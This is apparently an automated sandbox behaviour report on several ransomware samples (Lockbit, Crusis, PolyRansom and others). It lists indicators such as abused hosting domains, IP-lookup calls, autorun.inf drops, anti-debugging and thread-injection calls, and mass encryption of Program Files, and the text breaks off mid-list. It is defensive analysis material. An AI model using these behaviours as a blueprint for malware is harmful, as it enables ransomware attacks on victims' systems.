Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
Processes:
flow ioc 132094 iplogger.org 132095 iplogger.org 132103 pastebin.com 132104 pastebin.com 60 bitbucket.org 61 bitbucket.org 67 iplogger.org 69 iplogger.org -
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 64 ip-api.com 23664 api.2ip.ua 25430 api.2ip.ua 31661 api.2ip.ua 57695 api.2ip.ua 58533 api.2ip.ua 70401 api.2ip.ua 79133 checkip.amazonaws.com -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exedescription ioc process File opened for modification F:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened for modification C:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened for modification C:\AUTORUN.INF Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification F:\AUTORUN.INF Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe -
Drops file in System32 directory 4 IoCs
Processes:
Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exedescription ioc process File created C:\Windows\System32\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened for modification C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File created C:\Windows\SysWOW64\notepad.exe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exepid process 4524 HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe 3728 Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exedescription pid process target process PID 3384 set thread context of 3328 3384 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe PID 5052 set thread context of 2156 5052 Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe PID 552 set thread context of 10908 552 HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe PID 1292 set thread context of 7448 1292 HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe PID 1716 set thread context of 9252 1716 HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe -
Processes:
resource yara_rule C:\Users\Admin\Desktop\00381\Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe upx behavioral1/memory/3656-146-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/memory/3656-171-0x0000000000400000-0x0000000000424000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exedescription ioc process File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\BadgeLogo.scale-125_contrast-black.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\Microsoft Office\root\Client\msvcp120.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit-hover.svg.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\javafx\gstreamer.md.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_OwlEye.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_filetype_xd.svg Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ru\WindowsBase.resources.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-40_altform-unplated.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de\UIAutomationClient.resources.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\System.Drawing.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\sunmscapi.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\msvcr120.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\Microsoft Office\root\Office16\CSIRESOURCES.DLL.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\SplashScreen\PaintSplashScreen.scale-100.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\PresentationFramework.resources.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-36.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-125_contrast-white.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\UIAutomationTypes.resources.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\ui-strings.js.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\ui-strings.js.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_KMS_Client_AE-ul-oob.xrm-ms.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxWideTile.scale-400.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jdwp.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.StackTrace.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\Microsoft Office\root\Office16\MSQRY32.EXE.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\pl-pl\ui-strings.js Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ru-RU\tipresx.dll.mui Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\excel.x-none.msi.16.x-none.tree.dat.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderWideTile.contrast-black_scale-200.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text-2x.png.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-20.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-pl.xrm-ms Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\TagAlbumDefinitions\8C918D9A-F447-4EBD-BD45-29F1D9209FC9.json Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClientIsv.man.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\officemui.msi.16.en-us.boot.tree.dat.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerpoint.x-none.msi.16.x-none.boot.tree.dat.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-black\WideTile.scale-100.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7ES.dub Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-200.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons_ie8.gif.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\MSOUC.HXS Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\selector.js.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ul.xrm-ms Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Audio\Skype_Dtmf_0_Loud.m4a Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\net.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_CA\added.txt.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Scientific.targetsize-24_contrast-white.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\7-Zip\Lang\hi.txt.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program 